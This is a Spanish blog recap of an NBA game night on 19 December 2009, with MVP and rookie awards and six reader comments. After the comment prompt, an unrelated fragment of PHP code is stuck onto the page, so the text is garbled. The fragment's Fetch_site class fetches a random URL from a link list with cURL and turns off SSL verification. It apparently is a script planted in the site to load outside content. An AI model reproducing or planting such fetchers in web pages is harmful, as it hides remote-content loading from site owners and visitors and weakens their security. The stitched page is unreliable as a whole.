La Crónica (19/12/2009)

20 de December de 2009 por TheDeerHunter

Jornada fabulosa, en la que vivimos un buen número de partidos no aptos para cardíacos.

Preciosidad de duelo entre Jennings y Tyreke. La resolución ilustra el momento de ambos. A 5 segundos para el final Jennings mete un diabólico pase a Ilyasova para ganar, tiempo de sobras para que Evans replique. Game-winner en forma de bandeja en toda la cara de Bogut. Impresionante el impacto y la evolución del #13 King.

Otro duelo sorprendente fue el Duncan vs Roy Hibbert. El pupilo de Popovic tuvo que tirar de fortuna para recoger un tapón que le había clavado el sophomore, para ganar en el último suspiro un partido que tenían perdido.

Los Clippers se ponen muy cerca del 50% a la espera que vuelva Blake con el nuevo año. Los Sixers sin Iverson (pero con el mejor Speights) lo tuvieron en una canasta que había salido de los dedos de Iguodala con el tablero en rojo. En la prórroga, el rey fue, por fin, Baron Davis. También en la prórroga los Bulls dieron la campanada contra Atlanta con el mejor partido de la temporada de la mano del mejor Rose. Joe Johnson no fue capaz de compensar el pésimo partido de Josh Smith. Por parte de los toros, Deng sí fue un refuerzo suficiente para mantener la cabeza a Del Negro.

En el resto de la jornada, Ariza se salió en ataque y defensa para doblegar a los Thunder; los Suns impusieron nuevamente ventaja campo frente a los Wizards; Orlando se deshizo de Portland sin despeinarse y la defensa Brown no funcionó contra Utah.

PREMIOS

MVP: Los 22 rebotes de Camby, los 20 de Howard o los 32 puntos de Derrick Rose nos hacen dudar una milésima de segundo pero el premio es de manera merecida para Trevor Ariza. El de Houston cuajó una impresionante actuación con 31 puntos, 8 rebotes y 6 asistencias.

Rookie: 24-7-4 frente 15-6-9 o lo que es lo mismo Tyreke Evans frente Brandon Jennings. Premio para el de los Kings por ese fantástico buzzer beater.

Sorpresa: 20 puntos, 7 rebotes y 6 tapones, números de un Roy Hibbert que cada vez deja de sorprendernos más.

Decepción: La regularidad ha sido sin duda el debe de Josh Smith durante buena parte de su carrera deportiva. Ayer dio la de arena con un 2 de 12 en tiro que lastró definitivamente a su equipo. El mal partido de Kevin Durant también hay que comentarlo.

Esfuerzo en vano: Si en tu equipo juega la decepción de la jornada muy, muy bien has de jugar tu para compensarlo. Joe Johnson se cascó 40 puntos, 6 rebotes y 4 asistencias pero no fueron suficientes. Brandon Roy (33 puntos) y Gerald Wallace (30-13-5) tampco vieron recompensados sus esfuerzos.

Comenta

6 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Creo que el MVP se lo merece Gerald Wallace, a pesar de la derrota de Charlotte. Yo lo votaré para el All-Star.

      Citar

  2. Dantley2 dice:
    #2

    Gerald Wallace está inmenso. Otros años ya habría bajado el ritmo, pero debe ser que las lesiones quedan lejos que ahí sigue. Evidentemente tal como está, debe ser All-Star.

    Lo de Tyreke y Jennings precioso. A ver que dice Griffin, pero está siendo un duelo fantástico. A mí Jennings me calló la boca, la verdad es que tiene recursos de todo tipo. Pero lo de Tyreke huele a más grande, a ser un jugador que haga ganar títulos. Me encantó una comparación que leí hace poco, que cuando ve un hueco es como un running back del fútbol americano tirándose a por ese hueco hacia canasta. Y además lo hace integrando a sus compañeros sin ser un pasador natural como sí lo es Jennings.

    Pero ojo, que la temporada de Jason Thompson acompañando a Tyreke no tiene desperdicio. Ni la revelación Casspi o el recuperado Udrih. Lástima que Sergio no haya sido capaz de coger la ola.

      Citar

  3. Viva_Dirk dice:
    #3

    Yo no le pondria ningun pero a Sergio este año, cuando ha tenido un par de oportunidades lo ha hecho bien, estoy seguro de que vamos a ver 10-15 partidos jugando mas de 20 minutos.

      Citar

  4. PIRATA dice:
    #4

    Sobre ni un comentario sobre los amarillos va por el post del otro dia?
    A mi no me afecta, porque disfruto igual de vuestros analisis, per me hace gracia.

      Citar

  5. rojorob dice:
    #5

    Acabo de revisar mi “megaporra” (qué raro suena esto) y si se me permite la sugerencia, creo que debería haber un premio para alguien que fuese capaz de no acertar ni un solo resultado.

      Citar

  6. Txusma dice:
    #6

    Hombre! Algun equipo acertarás de los que entran en Playoffs, no? 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>